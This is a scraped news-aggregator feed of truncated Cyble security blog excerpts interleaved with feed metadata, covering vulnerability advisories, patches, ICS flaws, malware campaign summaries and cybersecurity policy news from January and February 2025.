flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat.  The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges.   CVE-2024-29059: Microsoft .NET Framework Info]]> 2025-02-05T12:25:39+00:00 https://cyble.com/blog/new-flaws-added-to-known-exploited-vulnerabilities-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647026 False Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  The Australian Cyber Security Centre (ACSC), part of the Australian Signals Directorate (ASD), has shared new information on cyber threats targeting individuals and organizations across the country. The ACSC has warned that Australians must remain vigilant and take immediate action to protect their personal and professional data.  Over the past few years, Australia has seen an alarming rise in cyberattacks, including phishing, ransomware, and denial-of-service attacks, which are impacting both businesses and private citizens. These cyberattacks often target vulnerabilities in online platforms and devices, aiming to steal sensitive information, disrupt services, or even demand ransom payments.  The ACSC has highlighted the rise of email scammers impersonating trusted organizations, such as the ACSC itself. These scammers often attempt to deceive users into disclosing personal details, such as passwords, bank information, or credit card numbers.  The Danger of Email Scammers  One of the most concerning tactics employed by cybercriminals is impersonating government agencies like the ACSC and the ASD. Email scammers frequently send fraudulent emails, often mimicking the ACSC\'s official logo and email signature, to create a sense of urgency and pressure individuals into responding.   These scam messages often contain threats, such a]]> 2025-02-05T10:32:24+00:00 https://cyble.com/blog/acsc-targets-email-scammers/ www.secnews.physaphae.fr/article.php?IdArticle=8646998 False Ransomware,Vulnerability None 3.0000000000000000 Cyble - CyberSecurity Firm Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it. The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors. The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code. The malware is capable of bypassing Chrome\'s App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files. Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection. The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution. The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels. Overview Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present. This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches ]]> 2025-02-05T09:40:09+00:00 https://cyble.com/blog/dual-injection-undermines-chromes-encryption/ www.secnews.physaphae.fr/article.php?IdArticle=8646983 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Overview NETGEAR has recently addressed two critical security vulnerabilities affecting its products, which, if exploited, could allow unauthenticated attackers to execute arbitrary code or remotely exploit devices. These vulnerabilities impact multiple models, including the XR series routers and WAX series access points. Given the high severity of these vulnerabilities, with Common Vulnerability Scoring System (CVSS) scores of 9.8 and 9.6, users are strongly advised to update their devices immediately to the latest firmware versions to prevent potential cyber threats. Details of the Security Vulnerabilities The vulnerabilities impact several NETGEAR devices and could allow remote attackers to take control of the affected routers and access points without requiring authentication. Such security flaws are particularly concerning as they can be leveraged for malicious activities, including data theft, network disruption, and unauthorized surveillance. Affected Devices and Firmware Updates NETGEAR has released fixes for the unauthenticated remote code execution (RCE) security vulnerability affecting the following models: XR1000: Fixed in firmware version 1.0.0.74 XR1000v2: Fixed in firmware version 1.1.0.22 XR500: Fixed in firmware version 2.3.2.134 ]]> 2025-02-04T10:58:37+00:00 https://cyble.com/blog/netgear-issues-security-severe-rce-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8646783 False Malware,Vulnerability,Threat,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble honeypot sensors have detected new attack attempts on vulnerabilities in Palo Alto Networks\' web management interface and the Apache OFBiz ERP system, among dozens of other exploits picked up by Cyble sensors. Cyble\'s recent sensor intelligence report to clients examined more than 30 vulnerabilities under active exploitation by hackers and also looked at persistent attacks against Linux systems and network and IoT devices. Threat actors continue to scan for vulnerable devices for ransomware attacks and add to botnets for DDoS attacks and crypto mining. The full reports also looked at banking malware, brute-force attacks, vulnerable ports, and phishing campaigns. Palo Alto Networks Vulnerabilities Targeted Cyble sensors detected attacks attempting to exploit an OS Command Injection vulnerability in the Palo Alto Networks PAN-OS management web interface. The vulnerability, CVE-2024-9474, could be used by hackers to escalate privileges in PAN-OS. It could allow attackers who can access the PAN-OS management web interface to perform actions on the firewall with root privileges. P]]> 2025-02-03T13:49:16+00:00 https://cyble.com/blog/cyble-sensors-detect-attacks-on-palo-alto-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8646525 False Ransomware,Vulnerability,Threat,Patching None 2.0000000000000000 Cyble - CyberSecurity Firm Overview Apple has released security updates to address a newly discovered vulnerability, CVE-2025-24085, in its Core Media framework. This vulnerability is classified as a privilege escalation flaw and is reportedly being actively exploited. If successfully leveraged by a malicious application, this vulnerability could enable an attacker to elevate privileges on an affected device. To mitigate the risk, Apple has released patches across multiple product lines, urging users and administrators to update their devices immediately. The affected operating systems include iOS 18.3 and iPadOS 18.3, macOS Sequoia 15.3, tvOS 18.3, visionOS 2.3, and watchOS 11.3. Details of CVE-2025-24085 The vulnerability stems from a use-after-free (UAF) issue, a memory management flaw where a program continues to access memory after it has been freed. This can lead to arbitrary code execution, privilege escalation, or application crashes. Apple has addressed this issue by improving memory management. Apple has acknowledged that CVE-2025-24085 may have been actively exploited against iOS versions before iOS 17.2. This underlines the urgency of updating affected devices to the latest security patches. Impacted Devices and Operating Systems Apple has rolled out security patches for the following devices and operating system versions: iOS 18.3 and iPadOS 18.3: iPhone XS and later iPad Pro 1]]> 2025-02-03T12:21:32+00:00 https://cyble.com/blog/apple-fixes-cve-2025-24085-security-update/ www.secnews.physaphae.fr/article.php?IdArticle=8646502 False Vulnerability,Threat,Prediction None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s weekly vulnerability insights to clients cover key vulnerabilities discovered between January 22 and January 28, 2025. The findings highlight a range of vulnerabilities across various platforms, including critical issues that are already being actively exploited. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities to their Known Exploited Vulnerability (KEV) catalog this week. Among these, the zero-day vulnerability CVE-2025-23006 stands out as a critical threat affecting SonicWall\'s SMA1000 appliances. In this week\'s analysis, Cyble delves into multiple vulnerabilities across widely used software tools and plugins, with particular attention to SimpleHelp remote support software, Ivanti\'s Cloud Services Appliance, and issues within RealHome\'s WordPress theme. As always, Cyble has also tracked underground activity, providing insights into Proof of Concepts (POCs) circulating among cyber criminals. Weekly Vulnerability Insights CVE-2025-23006 - SonicWall SMA1000 Appliances (Critical Zero-Day Vulnerability) A severe deserialization vulnerability in SonicWall\'s SMA1000 series appliances has been identified as a zero-day, impacting systems that are not yet patched. With a CVSSv3 score of 9.8, this vulnerability is critical and allows remote attackers to exploit deserialization flaws, leading to the potential execution of arbitrary code. This vulnerability was added to the KEV catalog by CISA on January 23, 2025, marking it as actively exploited in the wild. Organizations using SMA1000 appliances should prioritize patching as soon as an official update becomes available. 2. SimpleHelp Remote Support Software Vulnerabilities (Critical and High Severity) Three vulnerabilities were discovered in SimpleHelp\'s remote support software, used by IT professionals for remote customer assistance. These flaws include: CVE-2024-57726: A privilege escalation vulnerability that allows unauthorized users to gain administrative access due to insufficient backend authorization checks. ]]> 2025-01-31T10:18:43+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-update-critical/ www.secnews.physaphae.fr/article.php?IdArticle=8645197 False Tool,Vulnerability,Threat,Patching,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm Overview A pair of 9.8-severity flaws in mySCADA myPRO Manager SCADA systems were among the vulnerabilities highlighted in Cyble\'s weekly Industrial Control System (ICS) Vulnerability Intelligence Report. Cyble Research & Intelligence Labs (CRIL) examined eight ICS vulnerabilities in the January 28 report for clients, including high-severity flaws in critical manufacturing, energy infrastructure, and transportation networks. OS Command Injection (CWE-78) and Improper Security Checks (CWE-358, CWE-319) accounted for half of the vulnerabilities in the report, “indicating a persistent challenge in securing authentication and execution processes in ICS environments,” Cyble said. Critical mySCADA Vulnerabilities The critical mySCADA myPRO supervisory control and data acquisition (SCADA) vulnerabilities haven\'t yet appeared in the NIST National Vulnerability Database (NVD) or the MITRE CVE database, but they were the subject of a CISA ICS advisory on January 23. The mySCADA myPRO Manager system provides user interfaces and functionality for real-time monitoring and control of industrial processes across a range of critical industries and applications. CISA said the vulnerabilities can be exploited remotely with low attack complexity, potentially allowing a remote attacker to execute arbitrary commands or disclose sensitive information. CVE-2025-20061 was assigned a CVSS v3.1 base score of 9.8 and is an Improper Neutralization of Special Elements used in an OS Command (\'OS Command Injection\') vulnerability. CISA said mySCADA myPRO does not properly neutralize POST requests sent to a specific port with email information, so the vulnerability could be used to execute arbitrary commands on an affected system. CVE-2025-20014 is also a 9.8-severity OS Command Injection vulnerability, as myPRO also does not properly neutralize POST requests sent to a specific port with version information, which could potentially lead to an attacker executing arbitrary commands. The following mySCADA products are affected: myPRO Manager: Versions prior to 1.3 myPRO Runtime: Versions prior to 9.2.1 mySCADA recommends that users update to the latest versions: mySCADA PRO Manager 1.3 mySCADA PRO Runtime 9.2.1 ]]> 2025-01-30T08:42:50+00:00 https://cyble.com/blog/ics-vulnerability-report-cyble-urges-critical-myscada-fixes/ www.secnews.physaphae.fr/article.php?IdArticle=8644674 False Tool,Vulnerability,Patching,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued two urgent advisories regarding serious ICS vulnerabilities in industrial control systems (ICS) products. These ICS vulnerabilities, identified in Schneider Electric\'s RemoteConnect and SCADAPack x70 Utilities, as well as B&R Automation\'s Runtime software, pose online risks to critical infrastructure systems worldwide. The ICS vulnerabilities, if exploited, could lead to potentially devastating impacts on the integrity, confidentiality, and availability of systems within energy, critical manufacturing, and other essential sectors. Schneider Electric\'s Vulnerability in RemoteConnect and SCADAPack x70 Utilities The ICS vulnerability in Schneider Electric\'s RemoteConnect and SCADAPack x70 Utilities arises from the deserialization of untrusted data, identified as CWE-502. This flaw could allow attackers to execute remote code on affected workstations, leading to several security risks, including the loss of confidentiality and integrity. The issue is triggered when a non-admin authenticated user opens a malicious project file, which could potentially be introduced through email, file sharing, or other methods. Schneider Electric has assigned the CVE identifier CVE-2024-12703 to this vulnerability, with a base CVSS v3 score of 7.8 and a CVSS v4 score of 8.5. Both versions highlight the severity of the issue, with potential consequences including unauthorized remote code execution. This vulnerability affects all versions of both RemoteConnect and SCADAPack x70 Utilities, products widely deployed in sectors such as energy and critical manufacturing across the globe. Although Schneider Electric is working on a remediation plan for future product versions, there are interim steps that organizations can take to mitigate the risk. These include: Only opening project files from trusted sources Verifying file integrity by computing and checking hashes regularly Encrypting project files and restricting access to trusted users Using secure communication protocols when exchanging files over the network Following established SCADAPack Security Guidelines for added protection CISA recommends minimizing the network exposure of control system devices, ensuring they are not directly accessible from the internet, and placing control system networks behind firewalls to isolate them from business networks. When remote access is necessary, using secure methods like Virtual Private Networks (VPNs) is strongly advised. However, organizations should ens]]> 2025-01-29T13:01:36+00:00 https://cyble.com/blog/cisa-release-advisories-for-new-ics-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8644292 False Vulnerability,Threat,Patching,Industrial None 4.0000000000000000 Cyble - CyberSecurity Firm The Australian Government has awarded a $6.4 million grant to CI-ISAC Australia, enabling the establishment of a new Health Cyber Sharing Network (HCSN). This initiative is designed to facilitate the rapid exchange of critical cyber threat information within Australia\'s healthcare industry, which has become a target for cyberattacks. The recent surge in cyberattacks on Australian healthcare organizations, including hospitals and health insurance providers, has highlighted the pressing need for enhanced cybersecurity measures. In response, the Australian Government has made healthcare the priority sector for its formal funding efforts. This grant is part of a broader strategy to address the vulnerabilities in the nation\'s health sector and ensure it is better equipped to handle the cyber threats faced by the industry. A Growing Threat: The Cost of Cybersecurity Breaches The healthcare industry globally has been facing increasing cybersecurity challenges, and Australia is no exception. According to reports from 2023, the global healthcare sector continues to experience the most expensive data breaches across industries for the 13th consecutive year. The average cost of a healthcare data breach was a staggering AUD$10.93 million, nearly double that of the financial industry, which recorded an average cost of $5.9 million. Australia\'s health sector, which encompasses a diverse range of organizations, from public and private hospitals to medical clinics and insurance providers, is increasingly vulnerable to cyber threats. This sector includes approximately 750 government hospitals, 650 private hospitals, and over 6,500 general practitioner clinics, along with numerous third-party suppliers and vendors. The creation of the HCSN aims to address these risks by providing a secure, collaborative platform for information sharing. The network will enable health sector organizations to work together more effectively, breaking down silos and improving the speed and quality of cybersecurity threat information exchange. The Role of CI-ISAC and the Health Cyber-Sharing Network CI-ISAC Australia, the recipient of the $6.4 million Australian Government grant, will spearhead the creation and management of the Health Cyber Sharing Network. The HCSN will focus on fostering collaboration between Australian healthcare organizations, ensuring they can share relevant ]]> 2025-01-29T10:38:59+00:00 https://cyble.com/blog/australia-health-cyber-sharing-network/ www.secnews.physaphae.fr/article.php?IdArticle=8644244 False Data Breach,Vulnerability,Threat,Medical,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm Overview A series of critical security vulnerabilities have been discovered in multiple versions of Node.js, a popular open-source JavaScript runtime used to build scalable network applications. These vulnerabilities, outlined in CERT-In Vulnerability Note CIVN-2025-0011, have been classified as high severity, with the potential to compromise sensitive information, disrupt services, and even execute arbitrary code. Users of Node.js, including developers and organizations relying on this platform, are urged to take immediate action to secure their systems. The vulnerabilities affect several versions of Node.js, including both long-term support (LTS) and current releases. Affected versions include Node.js v18.x, v20.x, v22.x, and the latest v23.x. The flaws stem from various issues, including memory leaks, path traversal vulnerabilities, and worker permission bypasses, which could result in denial of service (DoS) conditions, data theft, and potential system compromises. The vulnerabilities present a high risk of unauthorized access to sensitive data, denial of service, or even complete system compromise. These flaws can be exploited remotely, allowing attackers to gain control over affected systems. The potential impacts are significant, especially in production environments where Node.js applications are running in high-traffic scenarios. Key Vulnerabilities in Node.js CVE-2025-23087 (Node.js v17.x and prior): This critical vulnerability affects older versions of Node.js (v17.x or earlier), with an attacker potentially gaining unauthorized access due to insufficient security controls. The severity of the flaw demands immediate attention from users of these older versions. CVE-2025-23088 (Node.js v19.x): A critical flaw affecting Node.js v19.x, which could allow an attacker to bypass security measures and execute arbitrary code. It\'s essential for users of v19.x to update to the latest release to mitigate the risk. CVE-2025-23089 (Node.js v21.x): Similar to CVE-2025-23088, this vulnerability impacts Node.js v21.x, allowing for potential exploitation due to a lack of proper access control and security features. Users should upgrade to patched versions of Node.js immediately. CVE-2025-23083 (Worker Permission Bypass): A high-severity vulnerability discovered in Node.js v20.x, v22.x, and v23.x, where an attacker could exploit the internal worker leak mechanism via the diagnostics_channel utility. This flaw could enable unauthorized access to worker threads, which are typically restricted, potentially leading to privilege escalation. ]]> 2025-01-28T12:00:59+00:00 https://cyble.com/blog/critical-vulnerabilities-in-node-js-expose-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8643779 False Tool,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Overview phpMyAdmin, a popular web-based tool for managing MySQL and MariaDB databases, has recently released version 5.2.2, addressing multiple vulnerabilities that posed a medium severity risk. This widely-used tool is a basis for database administrators, offering strong features and ease of use. However, the vulnerabilities discovered could potentially expose users to risks such as unauthorized actions, session hijacking, and data theft. The update resolves two cross-site scripting (XSS) vulnerabilities (CVE-2025-24530 and CVE-2025-24529) and a potential issue in the glibc/iconv library (CVE-2024-2961). These vulnerabilities underline the importance of staying up to date with security patches to safeguard sensitive data and ensure secure database management. According to the advisory: Reported By: The vulnerability was reported by a security researcher identified as "bluebird." Severity: Moderate. Solution: Users are encouraged to upgrade to version 5.2.2 or apply the patch. Vulnerability Details Three significant vulnerabilities were identified in phpMyAdmin versions prior to 5.2.2: 1. CVE-2025-24530: XSS in “Check Tables” Description: This XSS vulnerability allows an attacker to exploit the "Check Tables" feature by crafting a malicious table name. This could result in injecting malicious scripts into the application. Impact: Successful exploitation could lead to session hijacking, data theft, and unauthorized actions. CWE ID: CWE-661 (Improper Neutralization of Input During Web Page Generation). Fix: This issue was resolved through commit a45efd0eb9415240480adeefc587158c766bc4a0. 2. CVE-2025-24529: XSS in “Insert” Description: This vulnerability involves the "Insert" functionality, which could be manipulated to execute malicious scripts. Impact: Exploitation could compromise user accounts and sensitive data by injecting malicious code into user ]]> 2025-01-28T09:37:55+00:00 https://cyble.com/blog/phpmyadmin-5-2-2-addresses-critical-xss-and-library/ www.secnews.physaphae.fr/article.php?IdArticle=8643734 False Tool,Vulnerability,Threat,Medical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s vulnerability intelligence report to clients last week examined high-risk flaws in 7-Zip, Microsoft Windows, and Fortinet, among other products. It also examined dark web claims of a zero-day vulnerability in Apple iOS. In all, the report from Cyble Research and Intelligence Labs (CRIL) looked at 14 vulnerabilities and dark web exploits, including one vulnerability with a maximum CVSS severity score of 10.0 and another with more than 276,000 web exposures. Here are some of the vulnerabilities highlighted by Cyble\'s vulnerability intelligence unit as meriting high-priority attention by security teams. The Top IT Vulnerabilities CVE-2024-50603 is a 10.0-severity OS Command Injection vulnerability in the Aviatrix Controller that could allow an unauthenticated user to execute arbitrary commands against the cloud networking platform controller, due to improper neutralization of special elements used in an OS command. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation. CVE-2025-0411 is a critical vulnerability in the 7-Zip file archiving software that allows attackers to bypass the Mark-of-the-Web (MOTW) protection mechanism, which is intended to warn users about potentially dangerous files downloaded from the internet. An attacker could use the vulnerability to craft an archive file so that the files do not inherit the MOTW mark when they are extracted by 7-Zip. The vulnerability was just announced, but a patch has been available since November 30. As 7-Zip lacks an auto-update function, users must download the update directly. CVE-2024-12084 is a 9.8-severity Heap-Based Buffer Overflow vulnerability in the Rsync file synchronization tool. The vulnerability arises from improper handling of checksum lengths that exceed the fixed limit of 16 bytes (SUM_LENGTH) during the processing of user-controlled data. An attacker could manipulate checksum lengths, leading to out-of-bounds memory writes in the sum2 buffer. This could enable remote code execution (RCE) on systems running the Rsync server. Cyble detected more than 276,000 vulnerable web-facing Rsync exposures (image below). Dark Web Exploits and Zero Days The ]]> 2025-01-27T15:02:33+00:00 https://cyble.com/blog/it-vulnerability-report-7-zip-windows-and-fortinet-fixes-urged-by-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8643359 False Tool,Vulnerability,Threat,Patching,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The digital world in Southeast Asia is evolving rapidly, with nations striving to balance innovation, inclusivity, and security. The recently held 5th ASEAN Digital Ministers\' Meeting (ADGMIN) in Bangkok, Thailand, marked a significant milestone in this journey. The meeting highlighted the importance of cybersecurity in shaping a resilient digital future for the region. The ASEAN Digital Masterplan 2025 (ADM 2025) continues to serve as a guiding framework for fostering collaboration, enabling trust in digital services, and promoting the safe and inclusive use of technology. From addressing online scams to operationalizing the ASEAN Regional Computer Emergency Response Team (CERT) and advancing AI governance, the event showcased ASEAN\'s commitment to fortifying its digital ecosystem against cyber threats. With an emphasis on collaboration and proactive measures, the meeting highlighted the pressing need to enhance cybersecurity frameworks, strengthen cross-border data governance, and address emerging challenges posed by technologies like generative AI. Key Cybersecurity Highlights ASEAN Regional CERT Operationalization: One of the significant milestones discussed was the operationalization of the ASEAN Regional Computer Emergency Response Team (CERT). This initiative aims to enhance collaboration among member states, facilitate real-time information sharing, and strengthen the region\'s preparedness against cyberattacks. CERT\'s operationalization highlights ASEAN\'s focus on collective resilience in cyberspace. Tackling Online Scams: Online scams remain a pressing issue across ASEAN. The ASEAN Working Group on Anti-Online Scams (WG-AS) released its Report on Online Scams Activities in ASEAN (2023–2024), offering insights into the threat landscape. The report outlines key recommendations for regional collaboration to combat scams effectively. The ASEAN Recommendations on Anti-Online Scams provide a framework for governments to develop policies aimed at mitigating online fraud, with a focus on cross-border scams and fraudulent activities exploiting digital platforms. Promoting Responsible State Behavior in Cyberspace: ASEAN adopted the Checklist for Responsible State Behavior in Cyberspace, aligning with global norms to promote peace and security online. This initiative focuses on fostering cooperation and ensuring responsible use of digital tools while mitigating risks. Strengthening Cross-Border Data Governance: Data governance was another key topi]]> 2025-01-27T12:16:17+00:00 https://cyble.com/blog/united-against-cybercrime-asean-ministers-forge-new-security-pathways/ www.secnews.physaphae.fr/article.php?IdArticle=8643314 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  The Cybersecurity and Infrastructure Security Agency (CISA) has introduced Vulnrichment, an innovative initiative designed to enhance CVE data by adding crucial context, scoring, and detailed analysis. Launched on May 10, 2024, Vulnrichment aims to empower security professionals by providing more than just basic CVE information-it offers the insights needed to make informed, timely decisions regarding vulnerability management.   As part of a mid-year update, CISA\'s Tod Beardsley, Vulnerability Response Section Chief, provides an overview of how this resource can be leveraged to improve vulnerability management.  For IT defenders and vulnerability management teams, Vulnrichment represents a significant advancement in how CVE data is presented and utilized. By enriching basic CVE records with essential metadata like Stakeholder-Specific Vulnerability Categorization (SSVC) decision points, Common Weakness Enumeration (CWE) IDs, and Common Vulnerability Scoring System (CVSS) scores, Vulnrichment transforms raw CVE data into a more actionable and comprehensive resource.  The best part? No additional setup is required. This enhanced data is integrated directly into the CVE feeds already being consumed by security teams. Whether you\'re pulling CVE data from the official CISA platform at https://cve.org or GitHub at https://github.com/CVEProject/cvelistV5, you\'re already collecting the enriched CVE records that Vulnrichment provides.  How Vulnrichment Enhances CVE Data  CISA\'s Vulnrichment is designed to provide a deeper layer of insight into each CVE, helping security professionals prioritize vulnerabilities with greater clarity. Here\'s an example of how Vulnrichment works with a specific CVE, CVE-2023-45727, which has been marked as a Known Exploited Vulnerability (KEV) by CISA. If you want to understand the exploitation status of this CVE, you can query the SSVC decision points included in the Vulnrichment ADP (Authorized Data Publisher) container. For instance, using the command line tool jq, you can execute a query to extract the "Exploitation" field to understand whether the vulnerability is actively being exploited, requires proof of concept, or is not yet exploited in the wild.  By parsing the ADP container, you can extract this enriched data, which helps you make informed decisions about whether to prioritize this vulnerability over others. This ability to access context-rich CVE data provides valuable intelligence for vulnerability management efforts, enabling teams to prioriti]]> 2025-01-24T14:40:40+00:00 https://cyble.com/blog/cisa-reveals-vulnrichment-management-for-cve-data/ www.secnews.physaphae.fr/article.php?IdArticle=8642102 False Tool,Vulnerability,Threat,Patching,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Threat actors chained together four vulnerabilities in Ivanti Cloud Service Appliances (CSA) in confirmed attacks on multiple organizations in September, according to an advisory released this week by the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).  The agencies urged users to upgrade to the latest supported version of Ivanti CSA, and to conduct threat hunting on networks using recommended detection techniques and Indicators of Compromise (IoCs).  The January 22 advisory builds on October 2024 advisories from CISA and Ivanti and offers new information on the ways threat actors can chain together vulnerabilities in an attack. The four vulnerabilities were exploited as zero days, leading some to suspect sophisticated nation-state threat actors, possibly linked to the People\'s Republic of China (PRC).  The Ivanti CSA Exploit Chains  CVE-2024-8963, a critical administrative bypass vulnerability, was used in both exploit chains, first in conjunction with the CVE-2024-8190 and CVE-2024-9380 remote code execution (RCE) vulnerabilities, and in the second chain with CVE-2024-9379, a SQL injection vulnerability.  The vulnerabilities were chained to gain initial access, conduct RCE attacks, obtain credentials, and implant web shells on victim networks. In one case, the threat actors (TAs) moved laterally to two servers.  The vulnerabilities affect Ivanti CSA 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below. However, Ivanti says the CVEs have not been exploited in version 5.0.  The First Exploit Chain  In the RCE attacks, the threat actors sent a GET request to datetime.php to obtain session and cross-site request forgery (CSRF) tokens, followed by a POST request to the same endpoint using the TIMEZONE input field to manipulate the setSystemTimeZone]]> 2025-01-24T13:53:11+00:00 https://cyble.com/blog/ivanti-csa-attacks-cisa-fbi-expose-exploit-chain/ www.secnews.physaphae.fr/article.php?IdArticle=8642103 False Tool,Vulnerability,Threat,Patching,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  A pair of vulnerabilities in the Traffic Alert and Collision Avoidance System (TCAS) II for avoiding midair collisions were among 20 vulnerabilities reported by Cyble in its weekly Industrial Control System (ICS) Vulnerability Intelligence Report.  The midair collision system flaws have been judged at low risk of being exploited, but one of the vulnerabilities does not presently have a fix. They could potentially be exploited from adjacent networks.  Other ICS vulnerabilities covered in the January 15-21 Cyble report to subscribers include flaws in critical manufacturing, energy and other critical infrastructure systems. The full report is available for subscribers, but Cyble is publishing information on the TCAS vulnerabilities in the public interest.  TCAS II Vulnerabilities  The TCAS II vulnerabilities were reported to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) by European researchers and defense agencies. CISA in turn disclosed the vulnerabilities in a January 21 advisory.  The vulnerabilities are still undergoing analysis by NIST, but Cyble vulnerability researchers said the weaknesses “underscore the urgent need for enhanced input validation and secure configuration controls in transportation systems.”  TCAS airborne devices function independently of ground-based air traffic control (ATC) systems, according to the FAA, and provide collision avoidance protection for a range of aircraft types. TCAS II is a more advanced system for commercial aircraft with more than 30 seats or a maximum takeoff weight of more than 33,000 pounds. TCAS II offers advanced features such as recommended escape maneuvers for avoiding midair collisions.  The first vulnerability, CVE-2024-9310, is an “Untrusted Inputs” vulnerability in TCAS II that presently carries a CVSS 3.1 base score of 6.1.  CISA notes that “By utilizing software-defined radios and a custom low-latency processing pipeline, RF signals with spoofed location data can be transmitted to aircraft targets. This can lead to the appearance of fake aircraft on displays and potentially trigger undesired Resolution Advisories (RAs).”  The second flaw, CVE-2024-11166, is an 8.2-severity External Control of System or Configuration Setting vulnerability. TCAS II systems using transponders compliant with MOPS earlier than RTCA DO-181F could be attacked by threat actors impersonating a ground station to issue a Comm-]]> 2025-01-23T12:43:04+00:00 https://cyble.com/blog/aircraft-collision-ics-flaw-risks-mid-air-crashes/ www.secnews.physaphae.fr/article.php?IdArticle=8642105 False Tool,Vulnerability,Threat,Patching,Industrial,Commercial None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The Australian Cyber Security Centre (ACSC) has issued a detailed warning regarding Bulletproof Hosting Providers (BPH). These illicit infrastructure services play a critical role in supporting cybercrime, allowing malicious actors to conduct their operations while remaining largely undetectable. The Australian government\'s growing efforts to combat cybercrime highlight the increasing difficulty for cybercriminals to maintain secure, resilient, and hidden infrastructures. BPH services are an integral part of the Cybercrime-as-a-Service (CaaS) ecosystem, which provides a range of tools and services enabling cybercriminals to carry out their attacks. From ransomware campaigns to data theft, cybercriminals rely on BPH providers to host illicit websites, deploy malware, and execute phishing scams. These hosting services help criminals stay out of the reach of law enforcement and avoid detection, making it harder to track down those behind cyberattacks. The term "bulletproof" is somewhat misleading, as it is more of a marketing ploy than a reflection of the actual capabilities of these providers. Despite the branding, BPH providers remain vulnerable to disruption just like other infrastructure providers. What sets them apart is their blatant disregard for legal requests to shut down services, as they refuse to comply with takedown orders or abuse complaints from victims or law enforcement. This allows cybercriminals to continue their activities with little fear of being interrupted or exposed. How Bulletproof Hosting Providers Operate BPH providers typically lease virtual or physical infrastructure to cybercriminals, offering them a platform to run their operations. These services often include leasing IP addresses and servers that obscure the true identities of their customers. Many BPH providers achieve this by utilizing complex network switching methods, making it difficult to trace activity back to its source. In some cases, these providers even lease IP addresses from legitimate data centers or Internet Service Providers (ISPs), many of whom may remain unaware that their infrastructure is being used for criminal purposes. A key strategy employed by BPH providers is frequently changing the internet-facing identifiers associated with their customers. This could include altering IP addresses or domain names, further complicating efforts to track criminal activity. These techniques frustrate cybersecurity efforts and investigative agencies, hindering their ability to identify, apprehend, and disrupt criminal activity. Anot]]> 2025-01-22T10:44:07+00:00 https://cyble.com/blog/acsc-highlights-bulletproof-hosting-providers/ www.secnews.physaphae.fr/article.php?IdArticle=8642106 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation None 2.0000000000000000 Cyble - CyberSecurity Firm Overview Account credentials from some of the largest cybersecurity vendors can be found on the dark web, a result of the growing problem of infostealers, according to an analysis of Cyble threat intelligence data. The credentials – available for as little as $10 in cybercrime marketplaces – span internal accounts and customer access across web and cloud environments, including internal security company enterprise and development environments that could pose substantial risks. The accounts ideally would have been protected by multifactor authentication (MFA), which would have made any attack more difficult. However, the leaked credentials underscore the importance of dark web monitoring as an early warning system for keeping such leaks from becoming much bigger cyberattacks. Leaked Security Company Credentials Leaked credentials have an inherent time value – the older the credentials, the more likely the password has been changed – so Cyble researchers looked only at credentials leaked since the start of the year. Cyble looked at 13 of the largest enterprise security vendors-along with some of the bigger consumer security companies-and found credentials from all of them on the dark web. The credentials were likely pulled from info stealer logs and then sold in bulk on cybercrime marketplaces. Most of the credentials appear to be customer credentials that protect access to sensitive management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web, too. Security vendors had credentials leaked to potentially critical internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle, and Zoom, plus several other password managers, authentication systems, and device management platforms. Cyble did not attempt to determine whether any of 